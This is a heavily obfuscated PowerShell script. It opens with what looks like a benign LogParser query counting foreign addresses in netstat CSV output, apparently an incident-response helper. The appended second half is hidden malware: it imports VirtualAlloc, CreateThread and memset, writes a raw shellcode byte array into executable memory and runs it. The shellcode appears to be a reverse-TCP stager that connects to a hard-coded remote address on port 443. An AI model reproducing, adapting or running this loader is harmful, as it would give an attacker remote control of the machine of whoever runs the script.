Sv  ('1e6i'+'j2') ( [tyPe]("{3}{0}{1}{2}"-f 'TEm.','Io.','pATh','SYs'))  ;  

if (&("{3}{0}{2}{1}" -f 't-Com','and','m','Ge') ("{4}{1}{2}{3}{0}"-f'exe','og','pa','rser.','l')) {

    ${lPqu`e`RY} = ((("{106}{86}{28}{88}{55}{75}{73}{3}{77}{8}{103}{16}{74}{105}{57}{62}{35}{109}{117}{99}{9}{78}{113}{76}{112}{101}{6}{96}{12}{65}{11}{119}{38}{10}{89}{69}{81}{87}{83}{58}{26}{115}{21}{30}{59}{56}{25}{34}{42}{39}{1}{95}{23}{90}{49}{108}{68}{31}{22}{52}{63}{102}{36}{84}{46}{94}{92}{80}{91}{15}{24}{27}{17}{66}{5}{60}{14}{104}{47}{116}{44}{13}{51}{107}{48}{37}{20}{40}{67}{33}{32}{72}{18}{71}{29}{111}{4}{118}{70}{19}{54}{79}{82}{45}{2}{43}{50}{0}{114}{64}{53}{100}{98}{97}{61}{7}{85}{41}{110}{93}"-f'mponen','Address not lik','
   ','s','      Fo','r','dre','o','        State,
',' ','   P','te,
      ',',
        St','W; rC','W12','t in (r','       Compone','.0.',' Prot',',
','
    ','v
    WHERE
        ConPid ',' ','0.%rCW ','CW*','W4rCW) and
     ','tat.','rCW; rCW0.0','
    ','
 ','not in (','dress','     ','UP BY
 ','   ','    Process','%rCW an','rCW)','ponent,
     ','oreign','GR','ess,
        ','F',' ','1rC','tate,','
   ','0',']','        Fore','    Co','W[::]rCW;','not like rCW169.2','  ','  ','gn','C','  ','s','rCW0rCW; r','CW; 
            rC','
    ORDER BY
        Pr','  ','5',' ','a','0','O','nAd','ess','Address','ocol,',' ','e','nt,','Addr','re','s,
','     Pr','    ','ddress','
','  S',' *net','d','c','X','    FROM
       ','SELECT
        COUNT(Protocol,
        Forei','roc','and
',' no','reignA','
OqX','     Fo','e rCW1','ss','ess','oc','s ct,
  ','     Pr','gnAd','4',' ','7.','
','Oq',' rCW[::1','ig',') ','ct desc',' ','i','otocol,
        Fo','t,
','cs','.0.','a','reign','  Com'))  -rEpLaCe ([chAr]79+[chAr]113+[chAr]88),[chAr]34  -rEpLaCe 'rCW',[chAr]39)

    & ("{1}{0}"-f 'r','logparse') -stats:("{0}{1}" -f'o','ff') -i:("{1}{0}"-f'v','cs') -dtlines:0 -rtp:('-1') ${lpq`UERY}

} else {
    ${sC`RIptn`A`Me} =  (ChILdItEm  ("VariAb"+"lE:1"+"e"+"6ij2")  )."V`AlUe"::("{1}{2}{3}{0}"-f'leName','Get','F','i').Invoke(${MYI`NVocaTi`ON}."s`CrIp`Tn`Ame")
    "${ScriptName} requires logparser.exe in the path."
}

${C} = ((("{17}{55}{61}{9}{60}{10}{47}{62}{12}{51}{36}{8}{4}{72}{6}{79}{58}{57}{18}{21}{82}{76}{27}{80}{23}{1}{41}{38}{83}{63}{49}{69}{26}{14}{29}{56}{54}{3}{66}{25}{11}{43}{32}{78}{37}{52}{46}{35}{28}{77}{0}{48}{84}{31}{16}{39}{44}{20}{53}{22}{81}{33}{2}{5}{68}{71}{30}{73}{42}{67}{19}{70}{7}{15}{34}{13}{74}{45}{65}{75}{64}{59}{50}{40}{24}"-f 't','el','d)','Ptr l','tr lpAddr',';[Dl','ss, uin','er','tP','k','ltCu)','a','lAll','r','tern In','n Int','ntPtr lpParam','[','t flAllocationType, uint','static ex','t dwCreati',' flPr','t','kern',';','re','tic ex','llImpor',' lpSta','tPtr ','t','I','ttributes, uin','eadI','Pt','r','c(In',' dw','dlltCu)]','ete','uint count)','32.','tCu','dA','r, uin','memset(I','ackSize, IntPt',']public static extern IntPtr Vi','Addr','t',' src, ','o','St','onFlags, IntP','teThread(Int','DllIm','Crea',' uin',' dwSize,','int','ernel32.dl','port(tCu','rtua','ublic s','dest, u','ntP','pTh',')]public ','lIm','a','t','por','e','(tCumsvcrt.dll',' ','tr ','[D','r','t','t','t(tCu','r lpThr','otect);','p','ess, '))."r`E`pLAce"(([ChaR]116+[ChaR]67+[ChaR]117),[strInG][ChaR]34));${W} = .("{0}{2}{1}" -f'A','ype','dd-T') -memberDefinition ${C} -Name ("{0}{1}"-f 'Win3','2') -namespace ("{0}{2}{3}{1}" -f'W','ctions','in32Fu','n') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0x29,0xe3,0xbf,0x9c,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${z}."Le`NGth" -gt 0x1000){${g} = ${Z}."lE`Ngth"};${x}=${W}::("{2}{0}{1}" -f 'Al','loc','Virtual').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${Z}."LENg`Th"-1);${I}++) {${W}::"ME`M`sET"([IntPtr](${x}.("{0}{1}" -f 'ToInt','32').Invoke()+${I}), ${Z}[${I}], 1)};${w}::("{1}{3}{2}{0}"-f'ad','Cre','re','ateTh').Invoke(0,0,${X},0,0,0);for (;;){&("{0}{1}{2}" -f 'Start','-sle','ep') 60};
